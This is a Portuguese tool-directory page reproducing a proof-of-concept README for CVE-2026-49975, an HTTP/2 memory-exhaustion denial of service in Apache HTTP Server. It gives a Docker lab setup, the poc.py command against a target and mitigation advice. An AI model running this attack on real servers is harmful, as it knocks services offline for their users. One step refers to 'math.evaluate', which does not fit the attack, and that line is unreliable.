Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2026-49975 — HTTP/2 Bomb | Kitploit
Ferramentas/GitHubGitHub/eqstlab/cve-2026-49975
Vulnerability AnalysisExploitationWeb SecurityFuzzingPenetration Testing
GitHubeqstlab/cve-2026-49975

CVE-2026-49975

HTTP/2 Bomb

Ver Repositório
143há 1 mêsAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2026-49975 Bomba HTTP/2

★ CVE-2026-49975 HTTP/2 Bomb PoC ★

https://github.com/user-attachments/assets/89310771-f704-45d1-a6c3-d910de1dbc74


Visão Geral

CVE-2026-49975 é uma vulnerabilidade de Negação de Serviço (DoS) no Apache HTTP Server. A vulnerabilidade ocorre no caminho de tratamento de requisições HTTP/2, onde múltiplos campos de cabeçalho cookie podem ser mesclados sem serem contados adequadamente contra LimitRequestFields. Ao enviar uma pequena requisição HTTP/2 codificada em HPACK que se expande em muitos campos de cabeçalho cookie, um atacante pode forçar o servidor a alocar memória repetidamente durante a mesclagem do cabeçalho Cookie. O atacante pode então usar o controle de fluxo HTTP/2 para atrasar a transmissão da resposta, mantendo os fluxos afetados abertos e impedindo que a memória alocada seja liberada.


Versões Afetadas

CategoriaVersão
VulnerávelApache HTTP Server 2.4.17 ≤ versão ≤ 2.4.67
CorrigidaApache HTTP Server 2.4.68 ou posterior

Impacto

  • Negação de Serviço Remota (DoS)
  • Consumo excessivo de memória
  • Processamento atrasado ou falho de requisições normais de usuários

Ambiente

Build and run the vulnerable Apache HTTP Server environment.

root@kitploit:~
docker build -t cve-2026-49975 .
docker run -d --name cve-2026-49975 --memory 8g -p 10081:80 cve-2026-49975

PoC

Após iniciar o ambiente vulnerável, siga os passos abaixo para reproduzir o ataque.

Passo 1. Monitorar o uso de memória do servidor

root@kitploit:~
docker stats cve-2026-49975

Example output:

root@kitploit:~
CONTAINER ID   NAME             CPU %   MEM USAGE / LIMIT     MEM %
xxxxxxxxxxxx   cve-2026-49975   0.5%    35.2MiB / 8.0GiB      1.7%

Passo 2. Executar o PoC da Bomba HTTP/2

Envie a seguinte expressão para math.evaluate (por exemplo, através da entrada de cálculo da aplicação).

root@kitploit:~
python3 poc.py \
  --host TARGET_IP \
  --port 10081 \
  --connections 10 \
  --streams 100 \
  --refs 4091 \
  --initial-window 0 \
  --hold 300 \
  --drip-interval 2 \
  --drip-bytes 1

Passo 3. Confirmar o resultado

Verifique se o uso de memória do contêiner Apache aumenta e permanece alto enquanto os fluxos de ataque são mantidos abertos.

Mitigação

  • Atualizar o Apache HTTP Server para 2.4.68 ou posterior
  • Considere desabilitar o HTTP/2 temporariamente se o serviço não o exigir

Análise

  • KR: https://www.skshieldus.com/security-insights/reports/eqst-apache-http2-dos-cve-2026-49975
  • EN:
Baixar ferramenta